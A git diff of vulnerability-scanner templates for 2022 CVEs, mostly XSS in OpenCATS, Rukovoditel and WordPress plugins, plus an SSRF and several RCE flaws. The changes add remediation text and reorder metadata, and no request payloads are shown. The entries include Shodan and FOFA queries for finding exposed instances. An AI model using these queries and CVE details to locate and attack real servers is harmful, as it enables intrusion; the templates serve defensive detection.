http: diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 9af858dd46..9e7389a23a 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_entriesPerPage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43015 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-43015 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* epss-percentile: 0.29005 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"OpenCATS" verified: true + max-request: 2 vendor: opencats product: opencats + shodan-query: title:"OpenCATS" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 63bebdf198..7ac0949403 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_callback.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43016 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-43016 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* epss-percentile: 0.29005 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"OpenCATS" verified: true + max-request: 2 vendor: opencats product: opencats + shodan-query: title:"OpenCATS" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index 3f3b56cb23..2a05e42ef9 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_indexFile.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43017 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-43017 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* epss-percentile: 0.29005 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"OpenCATS" verified: true + max-request: 2 vendor: opencats product: opencats + shodan-query: title:"OpenCATS" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index 7df2778b8d..5e2d896f5d 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43018 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-43018 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* epss-percentile: 0.29005 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"OpenCATS" verified: true + max-request: 2 vendor: opencats product: opencats + shodan-query: title:"OpenCATS" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml index 76fd5fd9e5..63125280bf 100644 --- a/http/cves/2022/CVE-2022-4306.yaml +++ b/http/cves/2022/CVE-2022-4306.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 1.5.4. reference: - https://wpscan.com/vulnerability/18d7f9af-7267-4723-9d6f-05b895c94dbe - https://nvd.nist.gov/vuln/detail/CVE-2022-4306 - remediation: Fixed in version 1.5.4. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-4306 cwe-id: CWE-79 epss-score: 0.0007 - cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:* epss-percentile: 0.28777 + cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: panda_pods_repeater_field_project product: panda_pods_repeater_field + framework: wordpress tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated http: diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index f79ce6bc13..1ab6cc60e2 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -6,6 +6,8 @@ info: severity: high description: | kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the SSRF vulnerability in kkFileView 4.1.0. reference: - https://github.com/kekingcn/kkFileView/issues/392 - https://nvd.nist.gov/vuln/detail/CVE-2022-43140 @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-43140 cwe-id: CWE-918 epss-score: 0.05929 - cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* epss-percentile: 0.92483 + cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="kkFileView" - shodan-query: http.html:"kkFileView" verified: true + max-request: 1 vendor: keking product: kkfileview + shodan-query: http.html:"kkFileView" + fofa-query: app="kkFileView" tags: cve,cve2022,ssrf,kkFileview http: diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index e4c138a4ec..2f2a5a2deb 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + remediation: | + Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/4 - http://rukovoditel.com/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-43164 cwe-id: CWE-79 epss-score: 0.00076 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.31098 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" - shodan-query: http.favicon.hash:-1499940355 max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index a9515ad8f7..262b60e9e4 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create". + remediation: | + Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/5 - http://rukovoditel.com/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-43165 cwe-id: CWE-79 epss-score: 0.00076 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.31098 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.favicon.hash:-1499940355 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 0223f7819e..c434f4f2b0 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity". + remediation: | + Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/2 - http://rukovoditel.com/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-43166 cwe-id: CWE-79 epss-score: 0.00076 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.31098 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index 273310b3f8..bc6d3f6413 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". + remediation: | + Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/7 - http://rukovoditel.com/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-43167 cwe-id: CWE-79 epss-score: 0.00076 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.31098 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" - shodan-query: http.favicon.hash:-1499940355 max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index 9d5e8c8040..3f9a2bee8a 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group". + remediation: | + Upgrade Rukovoditel to a version higher than 3.2.1 or apply the necessary patches provided by the vendor to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/3 - http://rukovoditel.com/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-43169 cwe-id: CWE-79 epss-score: 0.00076 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.31098 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index 73c6fdf990..296fc28802 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block". + remediation: | + Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/6 - http://rukovoditel.com/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-43170 cwe-id: CWE-79 epss-score: 0.08907 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.93778 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index c83ad65b7e..efccbc0599 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + remediation: | + Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/1 - http://rukovoditel.com/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-43185 cwe-id: CWE-79 epss-score: 0.29169 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.96291 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml index e73c395864..5e1cacb62e 100644 --- a/http/cves/2022/CVE-2022-4320.yaml +++ b/http/cves/2022/CVE-2022-4320.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users. + remediation: Fixed in version 1.4.5. reference: - https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c - https://nvd.nist.gov/vuln/detail/CVE-2022-4320 - remediation: Fixed in version 1.4.5. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4320 cwe-id: CWE-79 epss-score: 0.00075 - cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:* epss-percentile: 0.30732 + cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: mhsoftware product: wordpress_events_calendar_plugin + framework: wordpress tags: calendar,event,xss,wordpress,wp,wp-plugin,cve,cve2022,wpscan http: diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index 894081b0df..a276895caa 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin + remediation: Fixed in version 1.1.2 reference: - https://wpscan.com/vulnerability/6ac1259c-86d9-428b-ba98-7f3d07910644 - https://nvd.nist.gov/vuln/detail/CVE-2022-4321 - https://wordpress.org/plugins/pdf-generator-for-wp/ - remediation: Fixed in version 1.1.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4321 cwe-id: CWE-79 epss-score: 0.00064 - cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.26173 + cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: wpswings product: pdf_generator_for_wordpress + framework: wordpress tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp http: diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index 51b640c47e..8e966b1a4f 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin. + remediation: Fixed in version 1.10.1. reference: - https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395 - https://wordpress.org/plugins/post-status-notifier-lite/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4325 - remediation: Fixed in version 1.10.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4325 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29012 + cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: ifeelweb product: post_status_notifier_lite + framework: wordpress tags: wp,wordpress,wpscan,authenticated,cve,cve2022,xss,wp-plugin,post-status-notifier-lite http: diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml index 8c90979ad8..2b90d00ecf 100644 --- a/http/cves/2022/CVE-2022-4328.yaml +++ b/http/cves/2022/CVE-2022-4328.yaml @@ -6,25 +6,25 @@ info: severity: critical description: | The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server. + remediation: Fixed in version 18.0 reference: - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4328 - remediation: Fixed in version 18.0 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4328 cwe-id: CWE-434 epss-score: 0.96022 - cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:* epss-percentile: 0.9925 + cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: najeebmedia product: woocommerce_checkout_field_manager + framework: wordpress tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive http: diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 7d36084a8c..32f9fcdb9a 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -6,25 +6,25 @@ info: severity: high description: | Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials. + remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2. reference: - https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769- - https://nvd.nist.gov/vuln/detail/CVE-2022-43769 - http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.html - remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-43769 cwe-id: CWE-94,CWE-74 epss-score: 0.59738 - cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* epss-percentile: 0.97318 + cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:1749354953 verified: true + max-request: 1 vendor: hitachi product: vantara_pentaho_business_analytics_server + shodan-query: http.favicon.hash:1749354953 tags: packetstorm,cve,cve2022,rce,ssti,pentaho,kev http: diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index 743890ff8e..8bd7152a0d 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update the Fontsy plugin to the latest version (>=1.8.7) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/6939c405-ac62-4144-bd86-944d7b89d0ad - https://wordpress.org/plugins/fontsy/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-4447 cwe-id: CWE-89 epss-score: 0.422 - cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:* epss-percentile: 0.96835 + cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: fontsy_project product: fontsy + framework: wordpress tags: cve,wordpress,wp,wpscan,cve2022,wp-plugin,sqli,fontsy,unauth variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 9a0d152306..4402472f87 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade to CentOS Web Panel version 0.9.8.1147 or later to mitigate this vulnerability. reference: - https://twitter.com/_0xf4n9x_/status/1612068225046675457 - https://github.com/numanturle/CVE-2022-44877 @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-44877 cwe-id: CWE-78 epss-score: 0.97473 - cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:* epss-percentile: 0.99945 + cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Login | Control WebPanel" verified: true + max-request: 1 vendor: control-webpanel product: webpanel + shodan-query: http.title:"Login | Control WebPanel" tags: packetstorm,cve,cve2022,centos,rce,kev http: diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index c04b4510af..c701dcab4e 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + remediation: | + Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/14 - http://rukovoditel.com/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-44944 cwe-id: CWE-79 epss-score: 0.00074 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.3053 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.favicon.hash:-1499940355 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index 14b389625a..aae88ccb6c 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + remediation: | + Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/15 - http://rukovoditel.com/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-44946 cwe-id: CWE-79 epss-score: 0.00074 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* epss-percentile: 0.3053 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.favicon.hash:-1499940355 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index b899598924..a87e8ae434 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add". + remediation: | + Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/13 - 